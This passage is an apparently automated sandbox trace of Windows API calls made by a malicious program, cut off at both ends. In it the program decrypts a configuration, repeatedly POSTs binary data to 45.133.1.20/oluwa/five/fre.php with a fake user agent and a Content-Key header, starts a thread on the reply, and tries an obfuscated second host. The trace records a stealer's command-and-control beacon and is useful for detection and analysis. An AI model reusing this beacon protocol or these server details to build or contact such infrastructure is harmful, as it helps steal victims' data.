GetProcessHeap () returned 0x6a0000 [0223.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.647] GetProcessHeap () returned 0x6a0000 [0223.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0223.648] GetProcessHeap () returned 0x6a0000 [0223.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0223.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.649] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.655] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0223.661] GetProcessHeap () returned 0x6a0000 [0223.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0223.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.662] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0223.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.663] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.664] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.664] GetProcessHeap () returned 0x6a0000 [0223.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0223.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.667] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0223.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.668] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0223.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.669] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0223.669] GetProcessHeap () returned 0x6a0000 [0223.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.671] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0223.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.672] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0223.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.673] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0223.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.674] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0223.675] GetProcessHeap () returned 0x6a0000 [0223.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0223.675] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0223.675] GetProcessHeap () returned 0x6a0000 [0223.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0223.675] socket (af=2, type=1, protocol=6) returned 0x68c [0223.675] connect (s=0x68c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0223.704] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0223.704] GetProcessHeap () returned 0x6a0000 [0223.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0223.704] GetProcessHeap () returned 0x6a0000 [0223.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0223.705] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.705] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.705] GetProcessHeap () returned 0x6a0000 [0223.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0223.705] GetProcessHeap () returned 0x6a0000 [0223.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.706] GetProcessHeap () returned 0x6a0000 [0223.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0223.706] GetProcessHeap () returned 0x6a0000 [0223.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0223.707] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.708] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.708] GetProcessHeap () returned 0x6a0000 [0223.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0223.708] GetProcessHeap () returned 0x6a0000 [0223.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0223.708] send (s=0x68c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0223.709] send (s=0x68c, buf=0x6bb998*, len=159, flags=0) returned 159 [0223.709] GetProcessHeap () returned 0x6a0000 [0223.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0223.709] recv (in: s=0x68c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0223.786] GetProcessHeap () returned 0x6a0000 [0223.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0223.787] GetProcessHeap () returned 0x6a0000 [0223.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0223.788] GetProcessHeap () returned 0x6a0000 [0223.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0223.789] GetProcessHeap () returned 0x6a0000 [0223.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0223.789] closesocket (s=0x68c) returned 0 [0223.790] GetProcessHeap () returned 0x6a0000 [0223.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0223.790] GetProcessHeap () returned 0x6a0000 [0223.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.790] GetProcessHeap () returned 0x6a0000 [0223.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0223.791] GetProcessHeap () returned 0x6a0000 [0223.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0223.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1368) returned 0x68c [0223.793] Sleep (dwMilliseconds=0xea60) [0223.795] GetProcessHeap () returned 0x6a0000 [0223.795] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0223.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.796] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0223.813] GetProcessHeap () returned 0x6a0000 [0223.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba5f0 [0223.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.814] CryptImportKey (in: hProv=0x6bed28, pbData=0x6ba5f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0223.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.815] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.816] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.817] GetProcessHeap () returned 0x6a0000 [0223.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0223.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.819] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0223.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.820] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0223.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.822] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0223.822] GetProcessHeap () returned 0x6a0000 [0223.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.827] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.828] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.829] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.829] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.830] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.830] GetProcessHeap () returned 0x6a0000 [0223.830] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0223.830] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.830] GetProcessHeap () returned 0x6a0000 [0223.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0223.830] GetProcessHeap () returned 0x6a0000 [0223.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.831] GetProcessHeap () returned 0x6a0000 [0223.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0223.831] GetProcessHeap () returned 0x6a0000 [0223.831] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0223.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.833] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.840] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0223.850] GetProcessHeap () returned 0x6a0000 [0223.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0223.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.852] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0223.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.853] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.854] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.854] GetProcessHeap () returned 0x6a0000 [0223.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0223.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.857] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0223.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.858] CryptDestroyKey (hKey=0x6ad020) returned 1 [0223.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.859] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0223.859] GetProcessHeap () returned 0x6a0000 [0223.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0223.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.860] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0223.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.862] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0223.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.863] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0223.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0223.864] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0223.864] GetProcessHeap () returned 0x6a0000 [0223.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0223.864] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0223.864] GetProcessHeap () returned 0x6a0000 [0223.864] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0223.864] socket (af=2, type=1, protocol=6) returned 0x690 [0223.865] connect (s=0x690, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0223.890] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0223.890] GetProcessHeap () returned 0x6a0000 [0223.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0223.890] GetProcessHeap () returned 0x6a0000 [0223.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0223.891] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.892] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.892] GetProcessHeap () returned 0x6a0000 [0223.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0223.892] GetProcessHeap () returned 0x6a0000 [0223.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0223.892] GetProcessHeap () returned 0x6a0000 [0223.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0223.892] GetProcessHeap () returned 0x6a0000 [0223.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0223.893] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0223.894] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.894] GetProcessHeap () returned 0x6a0000 [0223.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0223.894] GetProcessHeap () returned 0x6a0000 [0223.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0223.895] send (s=0x690, buf=0x6b5c98*, len=242, flags=0) returned 242 [0223.896] send (s=0x690, buf=0x6bb998*, len=159, flags=0) returned 159 [0223.896] GetProcessHeap () returned 0x6a0000 [0223.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0223.896] recv (in: s=0x690, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0223.970] GetProcessHeap () returned 0x6a0000 [0223.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0223.970] GetProcessHeap () returned 0x6a0000 [0223.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0223.971] GetProcessHeap () returned 0x6a0000 [0223.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0223.972] GetProcessHeap () returned 0x6a0000 [0223.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0223.972] closesocket (s=0x690) returned 0 [0223.973] GetProcessHeap () returned 0x6a0000 [0223.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0223.973] GetProcessHeap () returned 0x6a0000 [0223.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0223.973] GetProcessHeap () returned 0x6a0000 [0223.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0223.974] GetProcessHeap () returned 0x6a0000 [0223.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0223.974] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xca8) returned 0x690 [0223.976] Sleep (dwMilliseconds=0xea60) [0223.978] GetProcessHeap () returned 0x6a0000 [0223.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0223.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.979] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0223.990] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0224.002] GetProcessHeap () returned 0x6a0000 [0224.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6ba8 [0224.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.003] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b6ba8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.005] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.006] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.006] GetProcessHeap () returned 0x6a0000 [0224.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ba8 | out: hHeap=0x6a0000) returned 1 [0224.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.008] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0224.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.009] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.011] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0224.011] GetProcessHeap () returned 0x6a0000 [0224.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.015] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.016] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.020] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.021] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.022] GetProcessHeap () returned 0x6a0000 [0224.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0224.022] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.022] GetProcessHeap () returned 0x6a0000 [0224.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0224.022] GetProcessHeap () returned 0x6a0000 [0224.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.023] GetProcessHeap () returned 0x6a0000 [0224.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0224.023] GetProcessHeap () returned 0x6a0000 [0224.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0224.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.024] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.034] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 